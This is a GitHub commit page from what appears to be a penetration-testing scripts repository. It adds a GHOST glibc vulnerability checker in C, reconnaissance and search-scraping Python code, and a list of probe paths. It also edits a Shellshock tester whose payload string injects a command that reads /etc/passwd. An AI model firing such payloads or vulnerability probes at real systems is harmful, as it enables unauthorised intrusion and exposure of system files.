Skip to content

Commit

Permalink
Merge branch 'master' of github.com:brock7/scripts
Browse files Browse the repository at this point in the history
  • Loading branch information
Brock committed Oct 11, 2015
2 parents dbf5987 + 15c6cc4 commit 30ba665
Show file tree
Hide file tree
Showing 17 changed files with 234 additions and 5 deletions.
Binary file removed DSFS/files/config.bmp
Binary file not shown.
Binary file removed DSFS/files/config.gif
Binary file not shown.
Binary file removed DSFS/files/config.jpg
Binary file not shown.
Binary file removed DSFS/files/config.png
Binary file not shown.
33 changes: 33 additions & 0 deletions exp/ghost.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };
int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;
/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0';
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
}
Binary file removed files/config.bmp
Binary file not shown.
Binary file removed files/config.gif
Binary file not shown.
Binary file removed files/config.jpg
Binary file not shown.
Binary file removed files/config.png
Binary file not shown.
19 changes: 18 additions & 1 deletion gather.py
Original file line number Diff line number Diff line change
Expand Up @@ -58,7 +58,7 @@ def querySubdomain(domain):
for node in nodes:
print node, getTitle(node)

def queryRDNS(domain):
def queryRDNS_old(domain):
hostInfos = socket.gethostbyname_ex(domain) #r = (hostname, aliaslist, ipaddrlist)
for ipaddr in hostInfos[2]:
maxpage = 1
Expand All @@ -84,6 +84,23 @@ def queryRDNS(domain):
print e
#pass

def queryRDNS(domain):
hostInfos = socket.gethostbyname_ex(domain) #r = (hostname, aliaslist, ipaddrlist)
for ipaddr in hostInfos[2]:

print '[IP Address: ' + ipaddr + ']'
# TODO: 加入翻页代码
try:
response = urllib2.urlopen('http://dns.aizhan.com/%s/' % (ipaddr))
text = response.read()
tree = etree.HTML(text)
nodes = tree.xpath(r"//td[@class='dns-links']/a/@href")
for node in nodes:
print node, getTitle(node)
except Exception, e:
print e


def toStr(l):
#print type(l)
if type(l) != types.ListType:
Expand Down
23 changes: 23 additions & 0 deletions google-proxy.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
http://www.hxgoogle.com
http://www.gugesou.cn
http://www.google52.com
http://guge.droider.cn
http://www.gugeqq.com
https://www.52guge.com/
http://g.kvm.la
http://www.glcopy.com
http://www.guge.link/
https://www.booo.so/
http://www.gufensoso.com
http://www.g363.com
http://ggss.cc/
http://g.yh.gs
http://google.checkme.com.cn
http://www.googleforchina.com
https://goge.ml/
http://guge.droider.cn/
http://gg.cellmean.com/
http://g.eeload.com/
http://g.weme.so
http://g.lijun.me

2 changes: 1 addition & 1 deletion googleip.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@
import cookielib
import re
from lxml import etree
import ping
# import ping
import time

def ping(ip):
Expand Down
2 changes: 1 addition & 1 deletion tester/shock.py
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@

EXPLOIT1 = '() { :;};a=`/bin/cat /etc/passwd`;echo $a'
SLEEP_TIME = 7
EXPLOIT2 = '() { :;}; /bin/sleep %s' % SLEEP_TIME
EXPLOIT2 = '() { :;}; /bin/sleep %d' % SLEEP_TIME

#env -i X='() { (a)=>\' bash -c 'echo date'; cat echo
#无漏洞的输出:
Expand Down
34 changes: 34 additions & 0 deletions tr.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
#!/usr/bin/env python
# _*_ encoding: utf-8 _*_

import sys, os
import re

lineNum = 0
pos = 0
startLine = 0;
startPos = 0;
prev = ''
flag = 0
str = ''

for line in open(sys.argv[1]).readlines():
lineNum += 1
pos = 0
for c in line:
if c == '\"' and prev != '\\':
if flag == 0:
flag += 1
startLine = lineNum
startPos = pos
elif flag == 1:
str += c
if re.search('[+s]*#', line) == None:
print "%d:%d - %d:%d %s" % (startLine, startPos, lineNum, pos, str)
str = ''
flag = 0
if flag == 1:
str += c;
prev = c
pos += 1

1 change: 1 addition & 0 deletions uris.txt
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php
/cgi-bin/test-cgi
7 changes: 5 additions & 2 deletions utils/google.py
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@
import aolsearch
import googlesearch
import bingsearch
import hxgoogle

#searchEngine = googlesearch.google
#searchEngine = aolsearch.google
Expand All @@ -11,7 +12,7 @@
if os.environ.has_key('search_engine'):
search_engine = os.environ['search_engine']
else:
search_engine = 'gfsoso'
search_engine = 'hxgoogle'

if search_engine == 'gfsoso':
google = gfsoso.google
Expand All @@ -21,8 +22,10 @@
google = aolsearch.google
elif search_engine == 'bing':
google = bingsearch.google
elif search_engine == 'hxgoogle':
google = hxgoogle.google
else:
google = gfsoso.google
google = hxgoogle.google

searchEngine = google

118 changes: 118 additions & 0 deletions utils/hxgoogle.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,118 @@
# -*- encoding: utf-8 -*-

import urllib, urllib2
import cookielib
import re
import sys, getopt
import os
import random
from lxml import etree
import time
import locale
import webutils

HXGOOGLE_HOME = 'http://www.hxgoogle.com'
NUM_PER_PAGE = 10
REQ_TIMEOUT = 20
totalRecord = sys.maxint
reqDelay = 0.0

pattern = re.compile(r'<div id="resultStats">找到约 ([0-9,]+) 条结果')
pattern2 = re.compile(r'找不到和您的查询 "<em>.*?</em>" 相符的内容或信息。')

def _updateTotalRecord(html):
global totalRecord
m = pattern2.search(html)
if m != None:
totalRecord = 0
#print 'not found'
return
m = pattern.search(html)
if m == None:
return
if len(m.groups()) <= 0:
return
totalRecord = int(m.group(1).replace(',', ''))
print 'Total: ', totalRecord

def _hxPageHandler(opener, url):

# print 'page handler'
req = urllib2.Request(url)
webutils.setupRequest(req)
req.add_header('Referer', url[:-4])

try:
response = opener.open(req, timeout = REQ_TIMEOUT)
html = response.read()
# print html
except Exception, e:
print "Exception: url: %s - " % url, e
raise StopIteration()
if totalRecord == sys.maxint:
_updateTotalRecord(html)

tree = etree.HTML(html)
# nodes = tree.xpath(r'/html/body/table[2]/tbody/tr[2]/td[2]/ol/div/div[*]/div/h3/a/@href')
nodes = tree.xpath(r'//h3/a/@href')


for node in nodes:
url = node
yield url


def _hxSearch(opener, what, resultNum = -1, startNum = 0):
if resultNum == -1:
pageCount = -1
else:
pageCount = int((resultNum + NUM_PER_PAGE - 1) / NUM_PER_PAGE)

startPage = int((startNum + NUM_PER_PAGE - 1) / NUM_PER_PAGE)

global totalRecord
totalRecord = sys.maxint

what = urllib2.quote(what)

pageNum = 1
resCnt = 0

while True:
if pageCount != -1:
if pageNum > pageCount:
break
url = HXGOOGLE_HOME + '/search.jsp?q=%s&newwindow=1&safe=off&noj=1&hl=zh-CN&start=%d&sa=N' % (what, (startPage + pageNum) * 10)

for result in _hxPageHandler(opener, url):
# i += 1
resCnt += 1
yield result
if resultNum != -1 and resCnt >= resultNum:
raise StopIteration()
if resCnt >= totalRecord:
raise StopIteration()

if totalRecord == sys.maxint:
if resultNum == -1:
totalRecord = sys.maxint - 1
else:
totalRecord = resultNum

if resCnt >= totalRecord:
raise StopIteration()
#if i < NUM_PER_PAGE: # FIXME: if the result total is 10... :(
# raise StopIteration()
# break
pageNum += 1
if reqDelay > 0:
time.sleep(reqDelay)

google = _hxSearch

if __name__ == '__main__':
opener = urllib2.build_opener()
webutils.setupOpener(opener)
for url in google(opener, 'site:letv.com', 10):
print url

0 comments on commit 30ba665

Please sign in to comment.